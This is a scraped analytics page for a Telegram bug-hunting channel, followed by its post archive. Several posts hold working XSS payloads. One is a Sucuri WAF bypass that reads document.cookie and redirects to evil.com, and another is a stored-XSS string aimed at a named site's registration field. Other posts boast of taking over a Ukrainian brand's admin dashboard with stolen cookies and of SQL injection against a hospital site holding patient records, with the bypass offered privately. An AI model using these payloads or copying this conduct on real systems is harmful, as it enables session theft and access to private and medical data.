en
Feedback
π™‡π™€π™¨π™©π™¨π™šπ™˜

π™‡π™€π™¨π™©π™¨π™šπ™˜

Open in Telegram

α΄›ΚœΙͺs α΄„Κœα΄€Ι΄Ι΄α΄‡ΚŸ Ιͺs α΄€ΚŸΚŸ α΄€Κ™α΄α΄œα΄› Bᴜɒ Κœα΄œΙ΄α΄›ΙͺΙ΄Ι’ οΉ  Cʏʙᴇʀsᴇᴄ οΉ  Eα΄›ΚœΙͺα΄„α΄€ΚŸ Hα΄€α΄„α΄‹ΙͺΙ΄Ι’ Κ€α΄‡ΚŸα΄€α΄›α΄‡α΄… ᴄᴏɴᴛᴇɴᴛs. any query msg me at @Coffinxp1Bot Youtube:https://youtube.com/@lostsecc IF you want to support ;) https://www.buymeacoffee.com/coffinxp

Show more

πŸ“ˆ Analytical overview of Telegram channel π™‡π™€π™¨π™©π™¨π™šπ™˜

Channel π™‡π™€π™¨π™©π™¨π™šπ™˜ (@lostsec) in the English language segment is an active participant. Currently, the community unites 15 943 subscribers, ranking 5 964 in the Technologies & Applications category and 35 527 in the India region.

πŸ“Š Audience metrics and dynamics

Since its creation on Π½Π΅Π²Ρ–Π΄ΠΎΠΌΠΎ, the project has demonstrated rapid growth, gathering an audience of 15 943 subscribers.

According to the latest data from 30 October, 2024, the channel demonstrates stable activity. Although there has been a change in the number of participants by 1 442 over the last 30 days and by 0 over the last 24 hours, overall reach remains high.

  • Verification status: Not verified
  • Engagement rate (ER): The average audience engagement rate is 33.86%. Within the first 24 hours after publication, content typically collects 18.68% reactions from the total number of subscribers.
  • Post reach: On average, each post receives 5 398 views. Within the first day, a publication typically gains 2 978 views.
  • Reactions and interaction: The audience actively supports content: the average number of reactions per post is 108.

πŸ“ Description and content policy

The author describes the resource as a platform for expressing subjective opinions:
β€œα΄›ΚœΙͺs α΄„Κœα΄€Ι΄Ι΄α΄‡ΚŸ Ιͺs α΄€ΚŸΚŸ α΄€Κ™α΄α΄œα΄› Bᴜɒ Κœα΄œΙ΄α΄›ΙͺΙ΄Ι’ οΉ  Cʏʙᴇʀsᴇᴄ οΉ  Eα΄›ΚœΙͺα΄„α΄€ΚŸ Hα΄€α΄„α΄‹ΙͺΙ΄Ι’ Κ€α΄‡ΚŸα΄€α΄›α΄‡α΄… ᴄᴏɴᴛᴇɴᴛs. any query msg me at @Coffinxp1Bot Youtube:https://youtube.com/@lostsecc IF you want to support ;) https://www.buymeacoffee.com/coffinxp”

Thanks to the high frequency of updates (latest data received on 18 March, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.

15 943
Subscribers
No data24 hours
+1727 days
+1 44230 days
Posts Archive
wana see blind xss to full website control pannel dashboard takeover in just 5 seconds ?

when i see php and sqli endpoint ghauri/sqlmap start calling me please come bro we have to work..πŸ˜‚πŸ˜‰
when i see php and sqli endpoint ghauri/sqlmap start calling me please come bro we have to work..πŸ˜‚πŸ˜‰

thnq for the tool feedback ❀️
thnq for the tool feedback ❀️

thnq so much brother for 30 coffee πŸ”₯πŸ™ˆβ€οΈ sure i am always here for you all you can dm me anytime its my work !
thnq so much brother for 30 coffee πŸ”₯πŸ™ˆβ€οΈ sure i am always here for you all you can dm me anytime its my work !

tool is updated now ui+speed improvement+also when u press ctrl+c in xss it give u all scanned vulnerable urls results in htm
tool is updated now ui+speed improvement+also when u press ctrl+c in xss it give u all scanned vulnerable urls results in html file.. test site: https://github.com/coffinxp/loxs

congratulations again πŸŽ‰
congratulations again πŸŽ‰

famous ukraine brand site
famous ukraine brand site

whats going on..now in famous Ukraine brand internal admin token+cookie who did this now πŸ₯΄
whats going on..now in famous Ukraine brand internal admin token+cookie who did this now πŸ₯΄

if anyone from saudi arabia dm me i will give u sqli bypass command for sucuri waf you can report them..due to privacy i cant disclose all bcz thats contains hospital patients database..

Sucuri WAF Bypass: poc: https://youtu.be/7BJl2MzFlnE?si=utsxlXeVjkppTR0S payload: ClickMe ClickMe
Sucuri WAF Bypass: poc: https://youtu.be/7BJl2MzFlnE?si=utsxlXeVjkppTR0S payload:
<a aa aaa aaaa aaaaaa href=j&#97v&#97script&#x3A;&#97lert(document.cookie)>ClickMe
<a href="j&#97;vascript&#x3A;&#97;lert('Sucuri WAF Bypassed ! ' + document.domain + '\nCookie: ' + document.cookie); window&#46;location&#46;href='https://evil.com';">ClickMe</a>

so i never tried xss for sucuri i shared all types of xss bypass list till now..and also in our tool only get method so i tri
so i never tried xss for sucuri i shared all types of xss bypass list till now..and also in our tool only get method so i tried it manually some payloads from twitter or other sources none of them worked but after i some encoding i was able to bypass it..if you found any sacuri waf and there is htmli and protection on xss so must try this payload...and also the site i tested is so strong to bypass sqli in first time its detected sqli in sqlmap but not exploitable.after its not show any hint..so now we can try manuly and some bypass also its hospital site so if anyone try sqli make sure don't do any harm on site bcz its hospital site and many patient account there so..

guys send me all site that have sucuri waf let me test that payload in other tooπŸ”₯

Sucuri WAF Bypass ?

so finally i takeover full admin dashboard by adding internal cookie to my cookie manager πŸ˜‰
+1
so finally i takeover full admin dashboard by adding internal cookie to my cookie manager πŸ˜‰

Bro, you always impress me, your payloads are amazing, I use some of them at work and I'm just starting to study to get into
Bro, you always impress me, your payloads are amazing, I use some of them at work and I'm just starting to study to get into bugbounty, any advice?

also our scanner is so much improved now ui+speed+removed telegram bot option..tommrow upload on github..

this is the fileupload endpoint burp find and after i test i found stored xss in username field.always experiment all things.
this is the fileupload endpoint burp find and after i test i found stored xss in username field.always experiment all things.. endpoint: https://www.yamaha-friends.com/member-register payload: "><Svg/OnLoad=alert(document.cookie)>"@gmail.com field: username